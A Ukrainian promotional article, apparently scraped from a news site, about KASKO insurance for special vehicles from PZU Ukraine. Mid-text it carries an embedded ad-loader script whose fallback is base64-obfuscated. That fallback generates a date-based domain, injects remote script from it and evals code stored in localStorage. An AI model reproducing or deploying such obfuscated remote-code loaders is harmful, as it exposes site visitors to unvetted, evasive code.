КАСКО для спецтехніки від «ПЗУ Україна»

КАСКО ‒ це додаткове страхування транспортного засобу, яке дозволяє розраховувати на відшкодування збитків, якщо з ним сталася якась неприємність. КАСКО можна оформлювати не тільки для легкового чи вантажного автотранспорту. Для клієнтів компанії «ПЗУ Україна» також доступне страхування спецтехніки. Дізнатися більше про цю послугу можна на сайті компанії: https://www.pzu.com.ua/corporate/spetstransport_zd_transport/strahuvannya_spectehniku.html

Що покриває КАСКО

Якщо автоцивілка покриває завдані збитки третім особам, то отримувачем страхових виплат за умовами КАСКО є безпосередньо власник транспортного засобу, а в даному випадку — спеціальної техніки.

Договір страхування передбачає перелік різноманітних випадків, коли страхувальник отримує відшкодування збитків. Чим більше випадків покриває договір, тим більш універсальним він є.

В страховій компанії «ПЗУ Україна» ви можете оформити КАСКО, яке буде покривати збитки, що були завдані в результаті:

дорожньо-транспортної пригоди;стихійного лиха;протиправних дій третіх осіб;пожежі чи вибухів;падіння важких предметів (стовпів, дерев тощо).

Ціна страхового полісу формується низкою важливих факторів. До них варто віднести: тип автотранспорту та його вартість, термін дій договору, рік випуску транспортного засобу, умови його зберігання та використання. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Програми страхування для спецтехніки

В «ПЗУ Україна» є декілька програм, за допомогою яких можна оформити КАСКО для спецтехніки:

АВТОКАСКО ‒ відшкодування збитків після ДТП;добровільне страхування вантажів (ДСВ) ‒ покриває збитки, які були отримані під час перевезення вантажу;добровільне страхування майна (ДСМ) ‒ покриває збитки від таких ризиків, як вогонь та вибухи, стихійні лиха, протиправні дії третіх осіб, механічний вплив від сторонніх предметів.

КАСКО для спецтехніки від компанії «ПЗУ Україна» допоможе вам відшкодувати збитки, які пов’язані з транспортним парком підприємства.

Переваги КАСКО для спецтехніки в «ПЗУ Україна»

Кожна юридична особа, яка вирішить оформити КАСКО в страховій компанії «ПЗУ Україна», може розраховувати на низку особливих переваг. До них варто віднести:

Фінансову стабільність. ПрАТ СК «ПЗУ Україна» ‒ це одна з найбільших страхових компаній у Східній Європі. Саме тому кожен клієнт зможе розраховувати на збереження актуальності страхових послуг при довготривалому співробітництві.Якісний сервіс. За більше ніж 20 років роботи в Україні було відкрито понад 100 представництв, де кожен клієнт може скористатися послугами компанії або отримати консультацію від досвідчених страхових агентів.Короткі терміни відшкодування збитків. «ПЗУ Україна» завжди займає високі позиції за темпами страхових виплат.Цілодобова підтримка клієнтів. Звертайтеся за допомогою до операторів компанії у будь-який час.Допомога аварійного комісара. Вона буде дуже актуальною, якщо сталася дійсно складна аварія.

Для своїх клієнтів компанія «ПЗУ Україна» пропонує широкі можливості зі створення оптимального страхового полісу. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/kasko-dlya-spetstehniki-vid-pzu-ukrayina/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top